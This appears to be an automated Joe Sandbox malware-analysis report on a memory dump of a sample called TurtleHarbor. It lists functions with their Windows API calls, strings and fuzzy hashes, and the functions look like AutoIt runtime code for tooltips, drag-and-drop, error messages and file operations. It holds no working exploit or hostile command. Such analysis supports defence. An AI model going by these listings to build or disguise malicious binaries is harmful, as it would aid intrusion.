String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: b572ead7bfab89533350b5b7fe91231949d46da3e1f2e1e686a3d5c06ebcaabd
Instruction ID: 8c3207a7cee7b2e2e8842ea3ef40a1ea43103555f7882ce88897e3c74ad8df9a
Opcode Fuzzy Hash: b572ead7bfab89533350b5b7fe91231949d46da3e1f2e1e686a3d5c06ebcaabd
Instruction Fuzzy Hash: 1531C231A44219A6CB17FBA0DE43FEDB3A8AF20354F204129F541F50D6EF656E548B92

Function 0036CB97 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 0036CBAA
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0036CBBC
SetWindowTextW.USER32(?,?), ref: 0036CBD3
GetDlgItem.USER32(?,000003EA), ref: 0036CBE8
SetWindowTextW.USER32(00000000,?), ref: 0036CBEE
GetDlgItem.USER32(?,000003E9), ref: 0036CBFE
SetWindowTextW.USER32(00000000,?), ref: 0036CC04
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0036CC25
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0036CC3F
GetWindowRect.USER32(?,?), ref: 0036CC48
SetWindowTextW.USER32(?,?), ref: 0036CCB3
GetDesktopWindow.USER32 ref: 0036CCB9
GetWindowRect.USER32(00000000), ref: 0036CCC0
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0036CD0C
GetClientRect.USER32(?,?), ref: 0036CD19
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0036CD3E
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0036CD69

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: 63c6c793b55c653b2f4ca4ccefd432ef057acccb5b0a87d7124a16f3c41cf2a1
Instruction ID: f679419981e6927a2fe3d59c8aaa9b6f8b5fbf7b264e204b8d4bff179866248b
Opcode Fuzzy Hash: 63c6c793b55c653b2f4ca4ccefd432ef057acccb5b0a87d7124a16f3c41cf2a1
Instruction Fuzzy Hash: 87516D70900709AFDB22DFA8CE89B6EBBF9FF04705F004928E586A25A4C775A955CB50

Function 0039A7DE Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0039A87E
DestroyWindow.USER32(00000000,?), ref: 0039A8F8

Part of subcall function 00321821: _memmove.LIBCMT ref: 0032185B

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0039A972
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0039A994
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0039A9A7
DestroyWindow.USER32(00000000), ref: 0039A9C9
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00310000,00000000), ref: 0039AA00
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0039AA19
GetDesktopWindow.USER32 ref: 0039AA32
GetWindowRect.USER32(00000000), ref: 0039AA39
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0039AA51
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0039AA69

Part of subcall function 003129AB: GetWindowLongW.USER32(?,000000EB), ref: 003129BC

Strings

tooltips_class32, xrefs: 0039A96B, 0039A9F9
0, xrefs: 0039A894

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: 00ac9445fdce9f0f7126e885b226ed681c11c99b8c676cf79242b211b85d12ca
Instruction ID: 144fba0527f7a362a0c293bccf3f24ce0941e7e6fa9a0ec0fd97ad2a843063a4
Opcode Fuzzy Hash: 00ac9445fdce9f0f7126e885b226ed681c11c99b8c676cf79242b211b85d12ca
Instruction Fuzzy Hash: 4371DC71540604AFDB26CF28CC49FAB77E9FB89304F09061DF9868B2A0D730E915DB96

Function 0039CCA6 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 003129E2: GetWindowLongW.USER32(?,000000EB), ref: 003129F3

DragQueryPoint.SHELL32(?,?), ref: 0039CCCF

Part of subcall function 0039B1A9: ClientToScreen.USER32(?,?), ref: 0039B1D2
Part of subcall function 0039B1A9: GetWindowRect.USER32(?,?), ref: 0039B248
Part of subcall function 0039B1A9: PtInRect.USER32(?,?,0039C6BC), ref: 0039B258

SendMessageW.USER32(?,000000B0,?,?), ref: 0039CD38
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0039CD43
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0039CD66
_wcscat.LIBCMT ref: 0039CD96
SendMessageW.USER32(?,000000C2,00000001,?), ref: 0039CDAD
SendMessageW.USER32(?,000000B0,?,?), ref: 0039CDC6
SendMessageW.USER32(?,000000B1,?,?), ref: 0039CDDD
SendMessageW.USER32(?,000000B1,?,?), ref: 0039CDFF
DragFinish.SHELL32(?), ref: 0039CE06
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0039CEF9

Strings

@GUI_DRAGID, xrefs: 0039CE71
@GUI_DRAGFILE, xrefs: 0039CEA8
@GUI_DROPID, xrefs: 0039CE26

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 169749273-3440237614
Opcode ID: f413181fc9b2e9449f2afb46b7ce67841b961acc0bc958ed99f20bf54c27de0f
Instruction ID: 8224ab7a4ca2ce73020e577cb7fa430b5c002a2dbbc61ec4408b284726628ea6
Opcode Fuzzy Hash: f413181fc9b2e9449f2afb46b7ce67841b961acc0bc958ed99f20bf54c27de0f
Instruction Fuzzy Hash: 68617C71508301AFC706EF54DC85E9FBBE8EF89750F000A1EF595971A1DB709A49CB92

Function 003782D5 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 378timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 0037831A
VariantCopy.OLEAUT32(00000000,?), ref: 00378323
VariantClear.OLEAUT32(00000000), ref: 0037832F
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0037841D
__swprintf.LIBCMT ref: 0037844D
VarR8FromDec.OLEAUT32(?,?), ref: 00378479
VariantInit.OLEAUT32(?), ref: 0037852A
SysFreeString.OLEAUT32(?), ref: 003785BE
VariantClear.OLEAUT32(?), ref: 00378618
VariantClear.OLEAUT32(?), ref: 00378627
VariantInit.OLEAUT32(00000000), ref: 00378665

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 00378447
Default, xrefs: 003784DA

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 3730832054-3931177956
Opcode ID: f3934b2fbcd76bbc3a34ed0d961c14beeed74ceec25756035abf5ea659d8d58f
Instruction ID: 825978e6ac95130c0d2b2a40f9d467ff22b2c8c625ac816f3273faf4f475b4ea
Opcode Fuzzy Hash: f3934b2fbcd76bbc3a34ed0d961c14beeed74ceec25756035abf5ea659d8d58f
Instruction Fuzzy Hash: FDD1BD39644515EBEB369BA9C898A7EB7B8BF05700F14C555E40DAF690CF38E840DBA0

Function 003949CF Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00394A61
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00394AAC

Strings

CHECK, xrefs: 00394ACC
EXPAND, xrefs: 00394B5E
GETSELECTED, xrefs: 00394BBC
UNCHECK, xrefs: 00394C88
SELECT, xrefs: 00394C5D
COLLAPSE, xrefs: 00394AF2
EXISTS, xrefs: 00394B15
GETTOTALCOUNT, xrefs: 00394A93
GETITEMCOUNT, xrefs: 00394B8E
GETTEXT, xrefs: 00394BFF
ISCHECKED, xrefs: 00394C2F

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: 1ca9f07db2b72c3d60453b0c86f876bc35140caa8fa6a89df34a58739c2c70ec
Instruction ID: 39696f86e2ba3d6be9d884e67145a60a19c97283bf60aa5c9de8f8b2aa5f47a5
Opcode Fuzzy Hash: 1ca9f07db2b72c3d60453b0c86f876bc35140caa8fa6a89df34a58739c2c70ec
Instruction Fuzzy Hash: 13919D742007119FCF0AEF20C451EAAB7E5AF98354F11885CF8965B7A2DB30ED4ACB81

Function 0039BE70 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0039BF26
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,003997E7), ref: 0039BF82
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0039BFBB
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0039BFFE
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0039C035
FreeLibrary.KERNEL32(?), ref: 0039C041
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0039C051
DestroyIcon.USER32(?,?,?,?,?,003997E7), ref: 0039C060
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0039C07D
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0039C089

Part of subcall function 0033312D: __wcsicmp_l.LIBCMT ref: 003331B6

Strings

.icl, xrefs: 0039BE9C
.dll, xrefs: 0039BEDF
.exe, xrefs: 0039BEBC

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: 0ec6797715ccb437a553e279c23b1d92ffd52c2901f9fb1c9a6e6f7863e77f23
Instruction ID: db81af9401d014c64b6e149547d77ddebf124c461d8ed191f20e21bd7d1ad907
Opcode Fuzzy Hash: 0ec6797715ccb437a553e279c23b1d92ffd52c2901f9fb1c9a6e6f7863e77f23
Instruction Fuzzy Hash: 7E61B0B1510218FAEF1A9F64DC85BBA77ACEB08710F104209F916DA1D1DB75AA80DBA0

Function 0037E25D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 0037E31F
SystemTimeToFileTime.KERNEL32(?,?), ref: 0037E32F
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0037E33B
__wsplitpath.LIBCMT ref: 0037E399
_wcscat.LIBCMT ref: 0037E3B1
_wcscat.LIBCMT ref: 0037E3C3
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0037E3D8
SetCurrentDirectoryW.KERNEL32(?), ref: 0037E3EC
SetCurrentDirectoryW.KERNEL32(?), ref: 0037E41E
SetCurrentDirectoryW.KERNEL32(?), ref: 0037E43F
_wcscpy.LIBCMT ref: 0037E44B
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0037E48A

Strings

*.*, xrefs: 0037E445

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
String ID: *.*
API String ID: 3566783562-438819550
Opcode ID: ae88f03155b75fc8c3e336cbdd26d91e9c98bd58338b28c656b4f33df06d7d9a
Instruction ID: 34167342cd7f9550b482514ead24e1e039faf19d26e6d0f3e5b6cebb39f93ecb
Opcode Fuzzy Hash: ae88f03155b75fc8c3e336cbdd26d91e9c98bd58338b28c656b4f33df06d7d9a
Instruction Fuzzy Hash: AE615A725047459FC726EF60C884A9EB3E8FF89310F04895EF9898B251DB35E945CB92

Function 003123F7 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00311F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00312412,?,00000000,?,?,?,?,00311AA7,00000000,?), ref: 00311F76

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 003124AF
KillTimer.USER32(-00000001,?,?,?,?,00311AA7,00000000,?,?,00311EBE,?,?), ref: 0031254A
DestroyAcceleratorTable.USER32(00000000), ref: 0034BFE7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00311AA7,00000000,?,?,00311EBE,?,?), ref: 0034C018
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00311AA7,00000000,?,?,00311EBE,?,?), ref: 0034C02F
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00311AA7,00000000,?,?,00311EBE,?,?), ref: 0034C04B
DeleteObject.GDI32(00000000), ref: 0034C05D

Strings

h:, xrefs: 0031256F

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID: h:
API String ID: 641708696-2924159345
Opcode ID: 058a968b056bbe1a46c41bc22b5aa5f361a9f8a30802f7829190fef6353d8953
Instruction ID: 2e01831c9be8e0c0520b6577b0ec0657a2934e68cf2c964287c84a513ceae092
Opcode Fuzzy Hash: 058a968b056bbe1a46c41bc22b5aa5f361a9f8a30802f7829190fef6353d8953
Instruction Fuzzy Hash: 4561CE31116600DFDB2BDF15D848B7AB7F5FB49312F11951AE4424A960C771B8E0EF90

Function 0037A27B Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 0037A2C2

Part of subcall function 00321A36: _memmove.LIBCMT ref: 00321A77

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 0037A2E3
__swprintf.LIBCMT ref: 0037A33C
__swprintf.LIBCMT ref: 0037A355
_wprintf.LIBCMT ref: 0037A3FC
_wprintf.LIBCMT ref: 0037A41A

Strings

Incorrect parameters to object property !, xrefs: 0037A39E
Error: , xrefs: 0037A3C4
^ ERROR , xrefs: 0037A391
"%s" (%d) : ==> %s:%s%s, xrefs: 0037A3F7
"%s" (%d) : ==> %s:, xrefs: 0037A415
Line %d (File "%s"):, xrefs: 0037A336, 0037A34F

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-3080491070
Opcode ID: b2b0d2379f4c1a70a873ec195baf168d1fbe250c7e503ffb7f81656e19a42db1
Instruction ID: b06287f9568c2b79a8b1fab390e64f45a1a6d5f3abd7bac9615a0feab08ed156
Opcode Fuzzy Hash: b2b0d2379f4c1a70a873ec195baf168d1fbe250c7e503ffb7f81656e19a42db1
Instruction Fuzzy Hash: 1951E232900529AACF27EBE0EE46EEEB778EF14340F104155F409B6052EB352F58DBA1

Function 00370065 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000001,?,0035F8B8,00000001,0000138C,00000001,00000001,00000001,?,00383FF9,00000001), ref: 0037009A
LoadStringW.USER32(00000000,?,0035F8B8,00000001), ref: 003700A3

Part of subcall function 00321A36: _memmove.LIBCMT ref: 00321A77

GetModuleHandleW.KERNEL32(00000000,003D7310,?,00000FFF,?,?,0035F8B8,00000001,0000138C,00000001,00000001,00000001,?,00383FF9,00000001,00000001), ref: 003700C5
LoadStringW.USER32(00000000,?,0035F8B8,00000001), ref: 003700C8
__swprintf.LIBCMT ref: 00370118
__swprintf.LIBCMT ref: 00370129
_wprintf.LIBCMT ref: 003701D2
MessageBoxW.USER32(00000000,?,?,00011010), ref: 003701E9

Strings

^ ERROR, xrefs: 0037017E
%s (%d) : ==> %s: %s %s, xrefs: 003701CD
Error: , xrefs: 003701A0
Line %d:, xrefs: 00370123
Line %d (File "%s"):, xrefs: 00370112

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 984253442-2268648507
Opcode ID: f5db29a8b7c9086c439ac57ae35f369589d4751f84f07488a5f9ce31cfe75f42
Instruction ID: 2ea489c5bacb3b20fed1d165aab5ab02ebc156277d60f97305257de3ecde6838
Opcode Fuzzy Hash: f5db29a8b7c9086c439ac57ae35f369589d4751f84f07488a5f9ce31cfe75f42
Instruction Fuzzy Hash: 16414D72840129AACB16FBE0DE86EEEB77CAF24341F504155F505BA092DB356F48CBA1

Function 0037A995 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00314D37: __itow.LIBCMT ref: 00314D62
Part of subcall function 00314D37: __swprintf.LIBCMT ref: 00314DAC

CharLowerBuffW.USER32(?,?), ref: 0037AA0E
GetDriveTypeW.KERNEL32 ref: 0037AA5B
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0037AAA3
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0037AADA
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0037AB08

Part of subcall function 00321821: _memmove.LIBCMT ref: 0032185B

Strings

closed, xrefs: 0037AA22, 0037AA2B
open, xrefs: 0037AA35
close, xrefs: 0037AA14
set cd door , xrefs: 0037AAA9
close cd wait, xrefs: 0037AAF3
wait, xrefs: 0037AAC5
type cdaudio alias cd wait, xrefs: 0037AA86
open , xrefs: 0037AA6A

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: 95a4a06f4abf0fdd3445406fe428488b24414a1e211cb3f40172ee64134500d1
Instruction ID: 4b9ddfc3faf9958d44a816d1f367e320facf5334e09704e8367c394d88d4555b
Opcode Fuzzy Hash: 95a4a06f4abf0fdd3445406fe428488b24414a1e211cb3f40172ee64134500d1
Instruction Fuzzy Hash: F0516D711043159FC706EF10D992D6AB3F8FF98758F10891DF8999B261DB31AE05CB92

Function 0037A832 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0037A852
__swprintf.LIBCMT ref: 0037A874
CreateDirectoryW.KERNEL32(?,00000000), ref: 0037A8B1
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0037A8D6
_memset.LIBCMT ref: 0037A8F5
_wcsncpy.LIBCMT ref: 0037A931
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0037A966
CloseHandle.KERNEL32(00000000), ref: 0037A971
RemoveDirectoryW.KERNEL32(?), ref: 0037A97A
CloseHandle.KERNEL32(00000000), ref: 0037A984

Strings

:, xrefs: 0037A895
\??\%s, xrefs: 0037A86E
\, xrefs: 0037A88A

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: aabc933ae316982ca848e03af91f86ebf04a729398a6dd2d0599a11715d87a87
Instruction ID: 0bd2c1138d7a78cde46b0d267c12ae85e1d317bfe70214ee3d5c072e62982faa
Opcode Fuzzy Hash: aabc933ae316982ca848e03af91f86ebf04a729398a6dd2d0599a11715d87a87
Instruction Fuzzy Hash: 1131D471500219ABDB229FA0DC89FEF77BCEF89700F1141B6F608D6160E77496448B25

Function 0039C0A5 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0039982C,?,?), ref: 0039C0C8
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0039982C,?,?,00000000,?), ref: 0039C0DF
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0039982C,?,?,00000000,?), ref: 0039C0EA
CloseHandle.KERNEL32(00000000,?,?,?,?,0039982C,?,?,00000000,?), ref: 0039C0F7
GlobalLock.KERNEL32(00000000,?,?,?,?,0039982C,?,?,00000000,?), ref: 0039C100
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0039982C,?,?,00000000,?), ref: 0039C10F
